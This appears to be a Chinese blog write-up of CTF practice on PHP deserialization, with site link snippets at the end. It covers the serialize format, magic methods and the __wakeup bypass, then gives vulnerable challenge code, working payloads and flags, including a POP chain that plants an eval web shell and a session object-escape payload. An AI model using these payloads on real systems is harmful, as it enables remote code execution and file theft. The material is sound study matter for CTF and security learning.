serialize()函数

$s = serialize($变量); //该函数将变量数据进行序列化转换为字符串

file_put_contents(‘./目标文本文件', $s); //将$s保存到指定文件

a - array b - boolean

d - double i - integer

o - common object r - reference

s - string C - custom object

O - class N - null

R - pointer reference U - unicode string

了解了缩写的类型字母，便可以得到PHP序列化格式

1 2	`O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}` `对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}`

unserialize()函数

$s = file_get_contents(‘./目标文本文件'); //取得文本文件的内容（之前序列化过的字符串）

$变量 = unserialize($s); //将该文本内容，反序列化到指定的变量中

魔术方法

__construct 当一个对象创建时被调用，

__destruct 当一个对象销毁时被调用，

__toString 当一个对象被当作一个字符串被调用。

__wakeup() 使用unserialize时触发

__sleep() 使用serialize时触发

__destruct() 对象被销毁时触发

__call() 在对象上下文中调用不可访问的方法时触发

__callStatic() 在静态上下文中调用不可访问的方法时触发

__get() 用于从不可访问的属性读取数据

__set() 用于将数据写入不可访问的属性

__isset() 在不可访问的属性上调用isset()或empty()触发

__unset() 在不可访问的属性上使用unset()时触发

__toString() 把类当作字符串使用时触发,返回值需要为字符串

__invoke() 当脚本尝试将对象调用为函数时触发本特性

只在 PHP 5.3.0 及以上版本有效。

wakeup()魔法函数绕过

1 2	`PHP5<5.6.25` `PHP7<7.0.10`

PHP反序列化漏洞CVE-2016-7124

#a#重点：当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过 __wakeup 函数的执行

1.unserialize3

class xctf{                      //定义一个名为xctf的类

public $flag = '111';            //定义一个公有的类属性$flag，值为111

public function __wakeup(){      //定义一个公有的类方法__wakeup()，输出bad requests后退出当前脚本

exit('bad requests');

}

}

?code=

the answer is : cyberpeace{24a1e95dab10ea486aed8d9ffccbcbd1}

2.Web_php_unserialize

highlight_file() 函数对文件进行语法高亮显示。

语法

highlight_file(filename,return)

参数	描述
filename	必需。要进行高亮处理的 PHP 文件的路径。
return	可选。如果设置 true，则本函数返回高亮处理的代码。

<?php

class Demo {

    private $file = 'index.php';

    public function __construct($file) {

        $this->file = $file; (赋值)

    }


    function __destruct() {

        echo @highlight_file($this->file, true);

    }


    function __wakeup() { //需绕过

        if ($this->file != 'index.php') {

            //the secret is in the fl4g.php（提示）

            $this->file = 'index.php';

        　　}

    } 


}

if (isset($_GET['var'])) {

    $var = base64_decode($_GET['var']); //base64解码

    if (preg_match('/[oc]:\d+:/i', $var)) { //黑名单'o:c',可以用'o:+c'替代

        die('stop hacking!');

    } else {

        @unserialize($var);

    }

} else {

    highlight_file("index.php");

}

?>

“O:+4:“Demo”:3:{s:10:“Demofile”;s:8:“fl4g.php”;}”

$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

3.[极客大挑战 2019]PHP

<?php

    include 'class.php';

    $select = $_GET['select'];//传入参数

    $res=unserialize(@$select);

    ?>

<?php

include 'flag.php';

error_reporting(0);

class Name{

    private $username = 'nonono';

    private $password = 'yesyes';　　　　　　　　//初始化

    public function __construct($username,$password){

        $this->username = $username;

        $this->password = $password;　　　　　　//赋值

    }

    function __wakeup(){

        $this->username = 'guest';　　　　　　　//需绕过

    }

    function __destruct(){

        if ($this->password != 100) {

            echo "</br>NO!!!hacker!!!</br>";

            echo "You name is: ";

            echo $this->username;echo "</br>";

            echo "You password is: ";

            echo $this->password;echo "</br>";

            　　　　　　die();　　　　　　　　　　//password=100

        }

        if ($this->username === 'admin') {　 //username='admin'

            global $flag;

            echo $flag;

        }else{

            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";

            die();

        }

    }

}

?>

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

flag{d2e7fc8f-788c-45b9-a16b-a84c7a09ee20}

4. web/fxlh1/

<?php

class crow

{

    public $v1;

    public $v2;

    function eval() {

        echo new $this->v1($this->v2);

    }

    public function __invoke()

    {

        $this->v1->world();　　　　　　//3. 引发_call函数

    }

}

class fin

{

    public $f1;

    public function __destruct()

    {

        echo $this->f1 . '114514';　　　//6. 调用_tostring()函数

    }

    public function run()

    {

        ($this->f1)();　　　　　　　　　　

    }

    public function __call($a, $b)

    {

        echo $this->f1->get_flag();　　//2. 调用get_flag()函数

    }

}

class what

{

    public $a;

    public function __toString()

    {

        $this->a->run();　　　　　　　　//5. 调用run()函数

        return 'hello';

    }

}

class mix

{

    public $m1;

    public function run()

    {

        ($this->m1)();　　　　　　　　　　//4. 引发_invoke函数

    }

    public function get_flag()

    {

        eval('#'.$this->m1);　　　　　　//1.目标

    }

}

highlight_file(__FILE__);

if (isset($_POST['pop'])) {

    unserialize($_POST['pop']);

}

<?php

class crow

{

    public $v1;

    public $v2;

    public function __construct($v1)

    {

        $this->v1 = $v1;

    }

}

class fin

{

    public $f1;

    public function __construct($f1)

    {

        $this->f1 = $f1;

    }

}

class what

{

    public $a;

    public function __construct($a)

    {

        $this->a = $a;

    }

}

class mix

{

    public $m1;

    public function __construct($m1)

    {

        $this->m1 = $m1;

    }

}

$f = new mix("?><?=eval(\$_POST[1]);");

$e = new fin($f);

$d = new crow($e);

$c = new mix($d);

$b = new what($c);

$a = new fin($b);

echo urlencode(serialize($a));
//O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?>
//cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1

5.[安洵杯 2019]easy_serialize_php 1

考点

PHP中反序列化的对象逃逸a:2:{s:7:"flagphp";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
- a:2:{s:7:"";s:48:";s:1:"a";
- s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
- s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

 <?php

$function = @$_GET['f'];
//构造过滤函数

function filter($img){

    $filter_arr = array('php','flag','php5','php4','fl1g');

    $filter = '/'.implode('|',$filter_arr).'/i';//implode把数组元素组合为字符串

    return preg_replace($filter,'',$img);

}

if($_SESSION){

    unset($_SESSION);

}

//初赋值

$_SESSION["user"] = 'guest';

$_SESSION['function'] = $function;

extract($_POST);　　　　　　　　　　　　　　　　　　　　　　　　　　　　//函数从数组中将变量导入到当前的符号表

if(!$function){

    echo '<a href="index.php?f=highlight_file">source_code</a>';

}

if(!$_GET['img_path']){

    $_SESSION['img'] = base64_encode('guest_img.png');　　　　　　

}else{

    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));    //img赋值

}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){

    highlight_file('index.php');

}else if($function == 'phpinfo'){

    eval('phpinfo();'); //maybe you can find something in here!（发现d0g3_f1ag.php）

}else if($function == 'show_image'){　　　　　　　　　　　　　　　　　　　//确定function的值

    $userinfo = unserialize($serialize_info);

    echo file_get_contents(base64_decode($userinfo['img']));　　　　//目标

}

本地测试http://localhost:3000/textphp/serialize1.php?f=show_image&_SESSION[user]=flagphpphpphpphpphpphp&_SESSION[function]=;s:8:"function";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

a:3:{s:4:"user";s:22:"flagphpphpphpphpphpphp";s:8:"function";s:63:";s:8:"function";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
a:3:{s:4:"user";s:22:"";s:8:"function";s:63:";s:8:"function";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
d0g3_f1ag.php

周练3（php反序列化）的更多相关文章

牛客算法周周练20 F.紫魔法师 (二分图染色)
题意:给你一张图,对其染色,使得相连的点的颜色两两不同求,最少使用多少种颜色. 题解:首先,若$n=1$,只需要一种.然后我们再去判断是否是二分图,对于二分图,两种颜色就够了,若不是二分图,也就是 ...
重磅︱文本挖掘深度学习之word2vec的R语言实现
每每以为攀得众山小,可.每每又切实来到起点,大牛们,缓缓脚步来俺笔记葩分享一下吧,please~ --------------------------- 笔者寄语:2013年末,Google发布的 w ...
001-电脑操作规范-2019年03月.doc
001-电脑操作规范-2019年03月.doc 本文作者:徐晓亮 BoAi 作者腾讯QQ号码:595076941 /////////////////////////////////////// ...
NOIP2018 20天训练
Day 0 2018.10.20 其实写的时候已经是Day 1了--(凌晨两点) 终于停课了,爽啊 get树状数组+线段树(延迟标记) 洛谷:提高组所有nlogn模板+每日一道搜索题(基本的图的遍历题 ...
20165325 2017-2018-2《Java程序设计》课程总结
20165325 2017-2018-2<Java程序设计>课程总结一.每周作业链接汇总 1.预备作业一:我期待的师生关系 20165325 期望的师生关系简要内容: 我心中的好老师 ...
P1434 [SHOI2002]滑雪 dfs
题目描述 Michael喜欢滑雪.这并不奇怪,因为滑雪的确很刺激.可是为了获得速度,滑的区域必须向下倾斜,而且当你滑到坡底,你不得不再次走上坡或者等待升降机来载你.Michael想知道在一个区域中最长 ...
喊山 BFS
一个山头呼喊的声音可以被临近的山头同时听到.题目假设每个山头最多有两个能听到它的临近山头.给定任意一个发出原始信号的山头,本题请你找出这个信号最远能传达到的地方. 输入格式: 输入第一行给出3个正整数 ...
IT帮2019年2月线下活动【定义工作，解读自我】之站桩练习
2019年2月IT帮线下活动[定义工作,解读自我] 昨天的活动收获很大,全面的总结周老师会另写一篇来帮助大家回顾.我想说一下其中最打动我的一句话:“只有你能决定你有多优秀!” “工作中把自己当成企业家 ...
word2vec词向量训练及中文文本类似度计算
本文是讲述怎样使用word2vec的基础教程.文章比較基础,希望对你有所帮助! 官网C语言下载地址:http://word2vec.googlecode.com/svn/trunk/ 官网Python ...
20210717 noip18
考前从小饭桌出来正好遇到雨下到最大,有伞但还是湿透了路上看到一个猛男搏击暴风雨到了机房收拾了半天才开始考试 ys 他们小饭桌十分明智地在小饭桌看题,雨下小了才来考场状态很差. 开题,一点想法 ...

随机推荐

PRIx64：uint64_t类型输出为十六进制格式
#include <stdio.h> #include <stdint.h> #include <inttypes.h> int main(void) { uint ...
5、基于EasyExcel的导入导出
一.Apach POI处理Excel的方式: 传统Excel操作或者解析都是利用Apach POI进行操作,POI中处理Excel有以下几种方式: 1.HSSFWorkbook: HSSFWorkbo ...
[WPF]鼠标移动到Button颜色改变效果设置
代码 <Style x:Key="Button_Menu" TargetType="{x:Type Button}"> <Setter Pro ...
.Net6在Docker环境下操作Selenium.Chrome的那些坑
.Net6中想实现对某个网址截屏,可通过Selenium模拟访问网址并实现截图. 实现安装Nuget包 <PackageReference Include="Selenium.Chr ...
优化if...else...语句
写代码的时候经常遇到这样的场景:根据某个字段值来进行不同的逻辑处理.例如,不同的会员等级在购物时有不同的折扣力度.如果会员的等级很多,那么代码中与之相关的if...elseif...else...会特 ...
Java 进阶P-8.5+P-8.6
抛出异常异常的抛出与声明如果你的函数可能抛出异常,就必须在函数头部加以声明你可以声明并不会真的抛出得异常什么能扔? 任何继承了Throw able类的对象 Exception类继承了Throw ...
countdownlatch应用场景
场景1 让多个线程等待:模拟并发,让并发线程一起执行为了模拟高并发,让一组线程在指定时刻(秒杀时间)执行抢购,这些线程在准备就绪后,进行等待(CountDownLatch.await()),直到秒杀 ...
【一句话】CAP原则
首先一句话: 如果出现网络分区(P),持有旧数据的节点是否要继续提供服务,提供就保证了可用(A),但数据不一定新,放弃了C:如果不提供服务,则意味着放弃了可用性A,但是保证数据一致(C). 我的理解: ...
JAVA基础知识-String.format
转https://blog.csdn.net/anita9999/article/details/82346552 1 简介 String提供了format方法帮助我们对一个或者多个字符串进行格式 ...
sqlserver数据库批量新增修改类
MSSql Server 数据库批量操作需要引用的命名空间 using System; using System.Collections.Generic; using System.Data; us ...

周练3（php反序列化）